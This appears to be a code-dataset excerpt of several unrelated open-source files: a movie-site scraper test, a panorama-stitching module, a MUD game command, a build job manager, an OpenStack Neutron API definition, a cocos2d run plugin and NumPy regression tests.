shvets/GidOnline.bundle | test/gid_online_service_test.py | 1 | 4373 | # -*- coding: utf-8 -*-
import test_helper
import json
import re
import unittest
from gid_online_service import GidOnlineService
service = GidOnlineService()
#service.set_proxy("89.108.77.131:80", "http")
document = service.fetch_document(service.URL)
all_movies = service.get_movies(document)['items']
class GidOnlineServiceTest(unittest.TestCase):
def test_get_genres(self):
result = service.get_genres(document)
print(json.dumps(result, indent=4))
def test_get_top_links(self):
result = service.get_top_links(document)
print(json.dumps(result, indent=4))
def test_get_actors(self):
result = service.get_actors(document)
print(json.dumps(result, indent=4))
def test_get_actors_by_letter(self):
result = service.get_actors(document, letter='А')
print(json.dumps(result, indent=4))
def test_get_directors(self):
result = service.get_directors(document)
print(json.dumps(result, indent=4))
def test_get_directors_by_letter(self):
result = service.get_directors(document, letter='В')
print(json.dumps(result, indent=4))
def test_get_countries(self):
result = service.get_countries(document)
print(json.dumps(result, indent=4))
def test_get_years(self):
result = service.get_years(document)
print(json.dumps(result, indent=4))
def test_get_seasons(self):
result = service.get_seasons('/2016/03/strazhi-galaktiki/')
print(json.dumps(result, indent=4))
def test_get_episodes(self):
result = service.get_episodes('/2016/03/strazhi-galaktiki')
print(json.dumps(result, indent=4))
def test_parse_movies_page(self):
print(json.dumps(all_movies, indent=4))
def test_get_movies_on_genre_page(self):
document = service.fetch_document(service.URL + '/genre/vestern/')
result = service.get_movies(document, '/genre/vestern/')
print(json.dumps(result, indent=4))
def test_retrieve_movie_url(self):
# movie_url = all_movies[1]['path']
#
# print(movie_url)
movie_url = 'http://gidonline.club/2016/08/kapitan-fantastik/'
urls = service.retrieve_urls(movie_url)
print(json.dumps(urls, indent=4))
def test_retrieve_serials_url(self):
movie_url = 'http://gidonline.club/2016/03/strazhi-galaktiki/'
document = service.get_movie_document(movie_url)
serial_info = service.get_serial_info(document)
print(json.dumps(serial_info, indent=4))
def test_get_play_list(self):
#movie_url = all_movies[0]['path']
movie_url = 'http://gidonline.club/2016/05/lyubov-ne-po-razmeru/'
urls = service.retrieve_urls(movie_url)
print(json.dumps(urls, indent=4))
play_list = service.get_play_list(urls[2]['url'])
print(play_list)
def test_get_media_data(self):
movie_url = all_movies[0]['path']
document = service.fetch_document(movie_url)
data = service.get_media_data(document)
print(json.dumps(data, indent=4))
def test_get_serials_info(self):
movie_url = 'http://gidonline.club/2016/03/strazhi-galaktiki/'
document = service.get_movie_document(movie_url)
serial_info = service.get_serial_info(document)
print(json.dumps(serial_info, indent=4))
# for number, name in serial_info['seasons'].iteritems():
# print(number)
# print(name)
for number in sorted(serial_info['seasons'].keys()):
print(number)
print(serial_info['seasons'][number])
def test_re(self):
s = "http://gidonline.club/page/772/"
data = re.search('(' + service.URL + '/page/)(\d*)/', s)
print(data.group(2))
def test_search(self):
query = 'день выборов 2'
result = service.search(query)
print(json.dumps(result, indent=4))
def test_search_actors(self):
query = 'Аллен'
result = service.search_actors(document, query)
print(json.dumps(result, indent=4))
def test_search_director(self):
query = 'Люк'
result = service.search_directors(document, query)
print(json.dumps(result, indent=4))
if __name__ == '__main__':
unittest.main()
| mit | -1,188,585,378,694,636,300 | 25.216867 | 74 | 0.624311 | false |
m4tx/techswarm-receiver | tsparser/panorama.py | 1 | 4962 | import subprocess
import shutil
from PIL import Image
from tsparser.utils import StatisticDataCollector
PARAMS = {
'pto_gen': (),
'cpfind': ('--multirow',
'--celeste' # Ignore clouds
),
'cpclean': (),
'linefind': (),
'autooptimiser': ('-a', # Auto align
'-m', # Optimize photometric parameters
'-l', # Level horizon
'-s' # Select output projection and size automatically
),
'pano_modify': ('--canvas=AUTO', '--crop=AUTO'),
'nona': ('-m', 'TIFF')
}
JPEG_OPTIONS = {
'quality': 80,
}
def __call_panotool(cmd, project_url, *params, add_project_param=True):
"""
Call the specified Panorama tools command
The parameters, besides the ones passed as params argument, are taken from
PARAMS dictionary. Additionally, if add_project_param is True, then
a parameter with project URL is added at the end as well.
Function throws exception if the process returned non-zero exit code.
:param cmd: command to call
:type cmd: str
:param project_url: URL of the project
:type project_url: str
:param params: parameters to pass to the command
:type params: tuple
:param add_project_param: True if project URL should be appended to the
parameters (default behavior); False otherwise
:type add_project_param: bool
"""
params = [cmd, '-o', project_url] + list(PARAMS[cmd]) + list(params)
if add_project_param:
params += [project_url]
subprocess.check_call(params,
stderr=subprocess.STDOUT, stdout=subprocess.DEVNULL)
def __pano_to_jpeg(input_url, output_url):
"""
    Open the specified file (usually a TIFF), crop it, and save it in the given
    location with the options specified in JPEG_OPTIONS.
:param input_url: URL of source image
:type input_url: str
:param output_url: URL of destination file
:type output_url: str
"""
image = Image.open(input_url)
image.load()
image_box = image.getbbox()
cropped = image.crop(image_box)
cropped.save(output_url, **JPEG_OPTIONS)
def stitch_panorama(output_url, project_url, *input_urls):
"""
Stitch the panorama automatically out of the images specified in input_urls.
Basically the function just calls a bunch of commands taken mainly from
http://wiki.panotools.org/Panorama_scripting_in_a_nutshell. Parameters
to these CLI programs are taken from PARAMS dictionary, whereas options
used when saving JPEG file are stored in JPEG_OPTIONS.
    :param output_url: the URL to save the file in. It should not contain an
        extension, since the function creates two files:
        `output_url + '.tif'` and `output_url + '.jpg'`.
:type output_url: str
:param project_url: the URL to store panorama project in
:type project_url: str
:param input_urls: URLs of input images
:type input_urls: str
"""
__set_progress(0, 'Creating panorama project')
__call_panotool('pto_gen', project_url, *input_urls,
add_project_param=False)
__set_progress(5, 'Searching checkpoints')
__call_panotool('cpfind', project_url)
__set_progress(35, 'Cleaning checkpoints')
__call_panotool('cpclean', project_url)
__set_progress(45, 'Finding vertical lines')
__call_panotool('linefind', project_url)
__set_progress(55, 'Optimizing')
__call_panotool('autooptimiser', project_url)
__set_progress(65, 'Cropping')
__call_panotool('pano_modify', project_url)
__set_progress(70, 'Rendering')
__call_panotool('nona', output_url + '.tif', project_url,
add_project_param=False)
# Please note that the TIFF file generated by nona is not cropped
# automatically (i.e. it has transparent space around the actual panorama)
# - it is done along with converting the image to JPEG
__set_progress(95, 'Saving result as JPEG')
__pano_to_jpeg(output_url + '.tif', output_url + '.jpg')
__reset_progress()
def check_panotools_available():
"""
Check whether all required Panorama tools are installed and available
in the system and throw an exception if they are not.
List of the required tools is taken from the PARAMS dict (its keys
are taken, to be exact).
"""
missing = []
for command in PARAMS.keys():
if shutil.which(command) is None:
missing += [command]
if missing:
raise FileNotFoundError('Panorama tools are missing from the OS. '
'Tools that are not available: {}'
.format(', '.join(sorted(missing))))
def __set_progress(progress, operation):
sdc = StatisticDataCollector()
sdc.on_progress_changed(progress, 'Stitching panorama', operation + '...')
def __reset_progress():
StatisticDataCollector().on_progress_changed(-1, '', '')
| mit | 3,860,691,852,866,815,000 | 33.458333 | 80 | 0.638855 | false |
vlegoff/tsunami | src/secondaires/navigation/commandes/rames/tenir.py | 1 | 2899 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le paramètre 'tenir' de la commande 'rames'."""
from primaires.interpreteur.masque.parametre import Parametre
class PrmTenir(Parametre):
"""Commande 'rames tenir'.
"""
def __init__(self):
"""Constructeur du paramètre"""
Parametre.__init__(self, "tenir", "hold")
self.aide_courte = "saisit les rames"
self.aide_longue = \
"Cette commande permet de tenir les rames. Vous ne pouvez " \
"naturellement pas ramer sans tenir les rames auparavant."
def interpreter(self, personnage, dic_masques):
"""Interprétation du paramètre"""
salle = personnage.salle
if not hasattr(salle, "navire") or salle.navire is None or \
salle.navire.etendue is None:
personnage << "|err|Vous n'êtes pas sur un navire.|ff|"
return
navire = salle.navire
rames = salle.rames
if not rames:
personnage << "|err|Il n'y a pas de rames ici.|ff|"
return
personnage.agir("ramer")
if rames.tenu is personnage:
personnage << "|err|Vous tenez déjà ces rames.|ff|"
elif rames.tenu is not None:
personnage << "|err|Quelqu'un tient déjà ces rames.|ff|"
else:
rames.tenir(personnage)
| bsd-3-clause | 6,961,421,554,475,576,000 | 40.884058 | 79 | 0.694118 | false |
cnwzhjs/onemake | lib/job_manager.py | 1 | 3124 | import thread
import threading
import os.path
ALL_JOBS={}
JOBS_COUNT={
'pending': 0,
'working': 0,
'error': 0,
'done': 0,
'source': 0
}
JOBS_LOCK=thread.allocate_lock()
JOBS_COND=threading.Condition()
class Job(object):
def __init__(self, job_type, dest, depends, args=None):
self.job_type = job_type
self.dest = dest
self.depends = depends
self.args = args
self.__status = "pending"
@property
def status(self):
return self.__status
@status.setter
def status(self, v):
if v == self.__status:
return
JOBS_COUNT[self.__status] -= 1
JOBS_COUNT[v] += 1
self.__status = v
@property
def ready_to_start(self):
if self.__status != 'pending':
return False
for depend in self.depends:
if not depend:
continue
if depend.status != 'done':
return False
return True
@property
def should_compile(self):
if self.job_type == 'source_library':
return False
elif self.depends is None or not len(self.depends):
return not os.path.exists(self.dest)
else:
if not os.path.exists(self.dest):
return True
ctime = os.path.getctime(self.dest)
for depend_job in self.depends:
if depend_job is None:
continue
if os.path.exists(depend_job.dest) and os.path.getctime(depend_job.dest) > ctime:
return True
return False
def add_job(job_type, dest, depends, args=None):
if dest in ALL_JOBS:
return
job = Job(job_type, dest, depends, args)
JOBS_COUNT['pending'] += 1
ALL_JOBS[dest] = job
return job
def add_source_job(filename):
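    # Source files need no build step: register the job and mark it done immediately.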
job = add_job('source', filename, [])
if job is not None:
job.status = 'done'
JOBS_COUNT['source'] += 1
return job
def add_or_lookup_source_job(filename):
return ALL_JOBS[filename] if filename in ALL_JOBS else add_source_job(filename)
def fetch_and_mark_start():
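    # Returns ("work", job) for a job whose dependencies are all done, ("done", None) when
    # nothing is pending (or a job failed), and otherwise blocks on the condition variable
    # until another worker finishes and then retries.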
output = "wait", None
JOBS_LOCK.acquire()
if JOBS_COUNT['pending'] == 0 or JOBS_COUNT['error'] != 0:
output = "done", None
else:
for job in ALL_JOBS.values():
if job.ready_to_start:
job.status = 'working'
output = "work", job
break
JOBS_LOCK.release()
if output[0] == "wait":
JOBS_COND.acquire()
JOBS_COND.wait()
JOBS_COND.release()
return fetch_and_mark_start()
else:
return output
def __update_status(job, new_status):
JOBS_LOCK.acquire()
job.status = new_status
JOBS_LOCK.release()
JOBS_COND.acquire()
JOBS_COND.notify_all()
JOBS_COND.release()
def mark_error(job):
__update_status(job, 'error')
def mark_done(job):
__update_status(job, 'done')
| bsd-2-clause | 8,658,479,901,913,993,000 | 22.030769 | 97 | 0.529449 | false |
openstack/neutron-lib | neutron_lib/api/definitions/dhcpagentscheduler.py | 1 | 2226 | # Copyright (c) 2013 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import agent as agent_apidef
from neutron_lib.api.definitions import network as net_apidef
from neutron_lib import constants
DHCP_NET = 'dhcp-network'
DHCP_NETS = DHCP_NET + 's'
DHCP_AGENT = 'dhcp-agent'
DHCP_AGENTS = DHCP_AGENT + 's'
ALIAS = constants.DHCP_AGENT_SCHEDULER_EXT_ALIAS
IS_SHIM_EXTENSION = False
IS_STANDARD_ATTR_EXTENSION = False
NAME = 'DHCP Agent Scheduler'
API_PREFIX = ''
DESCRIPTION = 'Schedule networks among dhcp agents'
UPDATED_TIMESTAMP = '2013-02-07T10:00:00-00:00'
RESOURCE_ATTRIBUTE_MAP = {}
SUB_RESOURCE_ATTRIBUTE_MAP = {
DHCP_NETS: {
'parent': {
'collection_name': agent_apidef.COLLECTION_NAME,
'member_name': agent_apidef.RESOURCE_NAME
},
'parameters': {
'network_id': {
'allow_post': True, 'allow_put': False,
'default': constants.ATTR_NOT_SPECIFIED,
'enforce_policy': True,
'is_visible': True,
'validate': {'type:uuid': None}
}
}
},
DHCP_AGENTS: {
'parent': {
'collection_name': net_apidef.COLLECTION_NAME,
'member_name': net_apidef.RESOURCE_NAME
},
# NOTE(boden): the reference implementation only allows the index
# operation for the agent exposed under the network resource
'parameters': agent_apidef.RESOURCE_ATTRIBUTE_MAP[
agent_apidef.COLLECTION_NAME]
}
}
ACTION_MAP = {}
REQUIRED_EXTENSIONS = [agent_apidef.ALIAS]
OPTIONAL_EXTENSIONS = []
ACTION_STATUS = {}
| apache-2.0 | 8,052,478,717,131,474,000 | 33.78125 | 78 | 0.650943 | false |
imeteora/cocos2d-x-3.x-Qt | tools/cocos2d-console/plugins/project_run/project_run.py | 1 | 4469 | #!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Author: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
import BaseHTTPServer
import webbrowser
import threading
def open_webbrowser(url):
threading.Event().wait(1)
webbrowser.open_new(url)
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return "Compiles & deploy project and then runs it on the target"
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help="Set the run mode, should be debug|release, default is debug.")
group = parser.add_argument_group("web project arguments")
group.add_argument("port", metavar="SERVER_PORT", nargs='?', default='8000',
help="Set the port of the local web server, defualt is 8000")
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
iossim_exe_path = os.path.join(os.path.dirname(__file__), 'bin', 'ios-sim')
launch_sim = "%s launch %s &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = 'open %s &' % deploy_dep._macapp_path
self._run_cmd(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = os.path.join(sdk_root, 'platform-tools', 'adb')
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
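        # Serve the deployed web build from a local HTTP server and open it in the default browser.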
from SimpleHTTPServer import SimpleHTTPRequestHandler
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
port = int(self._port)
server_address = ('127.0.0.1', port)
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
from threading import Thread
deploy_dep = dependencies['deploy']
sub_url = deploy_dep.sub_url
url = 'http://127.0.0.1:%s%s' % (port, sub_url)
thread = Thread(target = open_webbrowser, args = (url,))
thread.start()
run_root = deploy_dep.run_root
with cocos.pushd(run_root):
cocos.Logging.info("Serving HTTP on %s, port %s ..." % (sa[0], sa[1]))
httpd.serve_forever()
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_cmd(os.path.join(run_root, exe))
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info("starting application")
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
| gpl-2.0 | 2,125,554,945,817,964,500 | 29.609589 | 105 | 0.585142 | false |
embray/numpy | numpy/core/tests/test_regression.py | 1 | 70764 | from __future__ import division, absolute_import, print_function
import copy
import pickle
import sys
import platform
import gc
import warnings
import tempfile
from os import path
from io import BytesIO
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal,
assert_almost_equal, assert_array_equal, assert_array_almost_equal,
assert_raises, assert_warns, dec
)
from numpy.testing.utils import _assert_valid_refcount
from numpy.compat import asbytes, asunicode, asbytes_nested, long, sixu
rlevel = 1
class TestRegression(TestCase):
def test_invalid_round(self,level=rlevel):
"""Ticket #3"""
v = 4.7599999999999998
assert_array_equal(np.array([v]), np.array(v))
def test_mem_empty(self,level=rlevel):
"""Ticket #7"""
np.empty((1,), dtype=[('x', np.int64)])
def test_pickle_transposed(self,level=rlevel):
"""Ticket #16"""
a = np.transpose(np.array([[2, 9], [7, 0], [3, 8]]))
f = BytesIO()
pickle.dump(a, f)
f.seek(0)
b = pickle.load(f)
f.close()
assert_array_equal(a, b)
def test_typeNA(self,level=rlevel):
"""Ticket #31"""
assert_equal(np.typeNA[np.int64], 'Int64')
assert_equal(np.typeNA[np.uint64], 'UInt64')
def test_dtype_names(self,level=rlevel):
"""Ticket #35"""
dt = np.dtype([(('name', 'label'), np.int32, 3)])
def test_reduce(self,level=rlevel):
"""Ticket #40"""
assert_almost_equal(np.add.reduce([1., .5], dtype=None), 1.5)
def test_zeros_order(self,level=rlevel):
"""Ticket #43"""
np.zeros([3], int, 'C')
np.zeros([3], order='C')
np.zeros([3], int, order='C')
def test_asarray_with_order(self,level=rlevel):
"""Check that nothing is done when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(a is np.asarray(a, order='F'))
def test_ravel_with_order(self,level=rlevel):
"""Check that ravel works when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(not a.ravel('F').flags.owndata)
def test_sort_bigendian(self,level=rlevel):
"""Ticket #47"""
a = np.linspace(0, 10, 11)
c = a.astype(np.dtype('<f8'))
c.sort()
assert_array_almost_equal(c, a)
def test_negative_nd_indexing(self,level=rlevel):
"""Ticket #49"""
c = np.arange(125).reshape((5, 5, 5))
origidx = np.array([-1, 0, 1])
idx = np.array(origidx)
c[idx]
assert_array_equal(idx, origidx)
def test_char_dump(self,level=rlevel):
"""Ticket #50"""
f = BytesIO()
ca = np.char.array(np.arange(1000, 1010), itemsize=4)
ca.dump(f)
f.seek(0)
ca = np.load(f)
f.close()
def test_noncontiguous_fill(self,level=rlevel):
"""Ticket #58."""
a = np.zeros((5, 3))
b = a[:, :2,]
def rs():
b.shape = (10,)
self.assertRaises(AttributeError, rs)
def test_bool(self,level=rlevel):
"""Ticket #60"""
x = np.bool_(1)
def test_indexing1(self,level=rlevel):
"""Ticket #64"""
descr = [('x', [('y', [('z', 'c16', (2,)),]),]),]
buffer = ((([6j, 4j],),),)
h = np.array(buffer, dtype=descr)
h['x']['y']['z']
def test_indexing2(self,level=rlevel):
"""Ticket #65"""
descr = [('x', 'i4', (2,))]
buffer = ([3, 2],)
h = np.array(buffer, dtype=descr)
h['x']
def test_round(self,level=rlevel):
"""Ticket #67"""
x = np.array([1+2j])
assert_almost_equal(x**(-1), [1/(1+2j)])
def test_scalar_compare(self,level=rlevel):
"""Ticket #72"""
a = np.array(['test', 'auto'])
assert_array_equal(a == 'auto', np.array([False, True]))
self.assertTrue(a[1] == 'auto')
self.assertTrue(a[0] != 'auto')
b = np.linspace(0, 10, 11)
self.assertTrue(b != 'auto')
self.assertTrue(b[0] != 'auto')
def test_unicode_swapping(self,level=rlevel):
"""Ticket #79"""
ulen = 1
ucs_value = sixu('\U0010FFFF')
ua = np.array([[[ucs_value*ulen]*2]*3]*4, dtype='U%s' % ulen)
ua2 = ua.newbyteorder()
def test_object_array_fill(self,level=rlevel):
"""Ticket #86"""
x = np.zeros(1, 'O')
x.fill([])
def test_mem_dtype_align(self,level=rlevel):
"""Ticket #93"""
self.assertRaises(TypeError, np.dtype,
{'names':['a'],'formats':['foo']}, align=1)
@dec.knownfailureif((sys.version_info[0] >= 3) or
(sys.platform == "win32" and platform.architecture()[0] == "64bit"),
"numpy.intp('0xff', 16) not supported on Py3, "
"as it does not inherit from Python int")
def test_intp(self,level=rlevel):
"""Ticket #99"""
i_width = np.int_(0).nbytes*2 - 1
np.intp('0x' + 'f'*i_width, 16)
self.assertRaises(OverflowError, np.intp, '0x' + 'f'*(i_width+1), 16)
self.assertRaises(ValueError, np.intp, '0x1', 32)
assert_equal(255, np.intp('0xFF', 16))
assert_equal(1024, np.intp(1024))
def test_endian_bool_indexing(self,level=rlevel):
"""Ticket #105"""
a = np.arange(10., dtype='>f8')
b = np.arange(10., dtype='<f8')
xa = np.where((a>2) & (a<6))
xb = np.where((b>2) & (b<6))
ya = ((a>2) & (a<6))
yb = ((b>2) & (b<6))
assert_array_almost_equal(xa, ya.nonzero())
assert_array_almost_equal(xb, yb.nonzero())
assert_(np.all(a[ya] > 0.5))
assert_(np.all(b[yb] > 0.5))
def test_endian_where(self,level=rlevel):
"""GitHuB issue #369"""
net = np.zeros(3, dtype='>f4')
net[1] = 0.00458849
net[2] = 0.605202
max_net = net.max()
test = np.where(net <= 0., max_net, net)
correct = np.array([ 0.60520202, 0.00458849, 0.60520202])
assert_array_almost_equal(test, correct)
def test_endian_recarray(self,level=rlevel):
"""Ticket #2185"""
dt = np.dtype([
('head', '>u4'),
('data', '>u4', 2),
])
buf = np.recarray(1, dtype=dt)
buf[0]['head'] = 1
buf[0]['data'][:] = [1, 1]
h = buf[0]['head']
d = buf[0]['data'][0]
buf[0]['head'] = h
buf[0]['data'][0] = d
assert_(buf[0]['head'] == 1)
def test_mem_dot(self,level=rlevel):
"""Ticket #106"""
x = np.random.randn(0, 1)
y = np.random.randn(10, 1)
# Dummy array to detect bad memory access:
_z = np.ones(10)
_dummy = np.empty((0, 10))
z = np.lib.stride_tricks.as_strided(_z, _dummy.shape, _dummy.strides)
np.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
# Do the same for the built-in dot:
np.core.multiarray.dot(x, np.transpose(y), out=z)
assert_equal(_z, np.ones(10))
def test_arange_endian(self,level=rlevel):
"""Ticket #111"""
ref = np.arange(10)
x = np.arange(10, dtype='<f8')
assert_array_equal(ref, x)
x = np.arange(10, dtype='>f8')
assert_array_equal(ref, x)
# Longfloat support is not consistent enough across
# platforms for this test to be meaningful.
# def test_longfloat_repr(self,level=rlevel):
# """Ticket #112"""
# if np.longfloat(0).itemsize > 8:
# a = np.exp(np.array([1000],dtype=np.longfloat))
# assert_(str(a)[1:9] == str(a[0])[:8])
def test_argmax(self,level=rlevel):
"""Ticket #119"""
a = np.random.normal(0, 1, (4, 5, 6, 7, 8))
for i in range(a.ndim):
aargmax = a.argmax(i)
def test_mem_divmod(self,level=rlevel):
"""Ticket #126"""
for i in range(10):
divmod(np.array([i])[0], 10)
def test_hstack_invalid_dims(self,level=rlevel):
"""Ticket #128"""
x = np.arange(9).reshape((3, 3))
y = np.array([0, 0, 0])
self.assertRaises(ValueError, np.hstack, (x, y))
def test_squeeze_type(self,level=rlevel):
"""Ticket #133"""
a = np.array([3])
b = np.array(3)
assert_(type(a.squeeze()) is np.ndarray)
assert_(type(b.squeeze()) is np.ndarray)
def test_add_identity(self,level=rlevel):
"""Ticket #143"""
assert_equal(0, np.add.identity)
def test_numpy_float_python_long_addition(self):
# Check that numpy float and python longs can be added correctly.
a = np.float_(23.) + 2**135
assert_equal(a, 23. + 2**135)
def test_binary_repr_0(self,level=rlevel):
"""Ticket #151"""
assert_equal('0', np.binary_repr(0))
def test_rec_iterate(self,level=rlevel):
"""Ticket #160"""
descr = np.dtype([('i', int), ('f', float), ('s', '|S3')])
x = np.rec.array([(1, 1.1, '1.0'),
(2, 2.2, '2.0')], dtype=descr)
x[0].tolist()
[i for i in x[0]]
def test_unicode_string_comparison(self,level=rlevel):
"""Ticket #190"""
a = np.array('hello', np.unicode_)
b = np.array('world')
a == b
def test_tobytes_FORTRANORDER_discontiguous(self,level=rlevel):
"""Fix in r2836"""
# Create discontiguous Fortran-ordered array
x = np.array(np.random.rand(3, 3), order='F')[:, :2]
assert_array_almost_equal(x.ravel(), np.fromstring(x.tobytes()))
def test_flat_assignment(self,level=rlevel):
"""Correct behaviour of ticket #194"""
x = np.empty((3, 1))
x.flat = np.arange(3)
assert_array_almost_equal(x, [[0], [1], [2]])
x.flat = np.arange(3, dtype=float)
assert_array_almost_equal(x, [[0], [1], [2]])
def test_broadcast_flat_assignment(self,level=rlevel):
"""Ticket #194"""
x = np.empty((3, 1))
def bfa(): x[:] = np.arange(3)
def bfb(): x[:] = np.arange(3, dtype=float)
self.assertRaises(ValueError, bfa)
self.assertRaises(ValueError, bfb)
def test_nonarray_assignment(self):
# See also Issue gh-2870, test for nonarray assignment
# and equivalent unsafe casted array assignment
a = np.arange(10)
b = np.ones(10, dtype=bool)
r = np.arange(10)
def assign(a, b, c):
a[b] = c
assert_raises(ValueError, assign, a, b, np.nan)
a[b] = np.array(np.nan) # but not this.
assert_raises(ValueError, assign, a, r, np.nan)
a[r] = np.array(np.nan)
def test_unpickle_dtype_with_object(self,level=rlevel):
"""Implemented in r2840"""
dt = np.dtype([('x', int), ('y', np.object_), ('z', 'O')])
f = BytesIO()
pickle.dump(dt, f)
f.seek(0)
dt_ = pickle.load(f)
f.close()
assert_equal(dt, dt_)
def test_mem_array_creation_invalid_specification(self,level=rlevel):
"""Ticket #196"""
dt = np.dtype([('x', int), ('y', np.object_)])
# Wrong way
self.assertRaises(ValueError, np.array, [1, 'object'], dt)
# Correct way
np.array([(1, 'object')], dt)
def test_recarray_single_element(self,level=rlevel):
"""Ticket #202"""
a = np.array([1, 2, 3], dtype=np.int32)
b = a.copy()
r = np.rec.array(a, shape=1, formats=['3i4'], names=['d'])
assert_array_equal(a, b)
assert_equal(a, r[0][0])
def test_zero_sized_array_indexing(self,level=rlevel):
"""Ticket #205"""
tmp = np.array([])
def index_tmp(): tmp[np.array(10)]
self.assertRaises(IndexError, index_tmp)
def test_chararray_rstrip(self,level=rlevel):
"""Ticket #222"""
x = np.chararray((1,), 5)
x[0] = asbytes('a ')
x = x.rstrip()
assert_equal(x[0], asbytes('a'))
def test_object_array_shape(self,level=rlevel):
"""Ticket #239"""
assert_equal(np.array([[1, 2], 3, 4], dtype=object).shape, (3,))
assert_equal(np.array([[1, 2], [3, 4]], dtype=object).shape, (2, 2))
assert_equal(np.array([(1, 2), (3, 4)], dtype=object).shape, (2, 2))
assert_equal(np.array([], dtype=object).shape, (0,))
assert_equal(np.array([[], [], []], dtype=object).shape, (3, 0))
assert_equal(np.array([[3, 4], [5, 6], None], dtype=object).shape, (3,))
def test_mem_around(self,level=rlevel):
"""Ticket #243"""
x = np.zeros((1,))
y = [0]
decimal = 6
np.around(abs(x-y), decimal) <= 10.0**(-decimal)
def test_character_array_strip(self,level=rlevel):
"""Ticket #246"""
x = np.char.array(("x", "x ", "x "))
for c in x: assert_equal(c, "x")
def test_lexsort(self,level=rlevel):
"""Lexsort memory error"""
v = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
assert_equal(np.lexsort(v), 0)
def test_lexsort_invalid_sequence(self):
# Issue gh-4123
class BuggySequence(object):
def __len__(self):
return 4
def __getitem__(self, key):
raise KeyError
assert_raises(KeyError, np.lexsort, BuggySequence())
def test_pickle_dtype(self,level=rlevel):
"""Ticket #251"""
pickle.dumps(np.float)
def test_swap_real(self, level=rlevel):
"""Ticket #265"""
assert_equal(np.arange(4, dtype='>c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='<c8').imag.max(), 0.0)
assert_equal(np.arange(4, dtype='>c8').real.max(), 3.0)
assert_equal(np.arange(4, dtype='<c8').real.max(), 3.0)
def test_object_array_from_list(self, level=rlevel):
"""Ticket #270"""
a = np.array([1, 'A', None])
def test_multiple_assign(self, level=rlevel):
"""Ticket #273"""
a = np.zeros((3, 1), int)
a[[1, 2]] = 1
def test_empty_array_type(self, level=rlevel):
assert_equal(np.array([]).dtype, np.zeros(0).dtype)
def test_void_copyswap(self, level=rlevel):
dt = np.dtype([('one', '<i4'), ('two', '<i4')])
x = np.array((1, 2), dtype=dt)
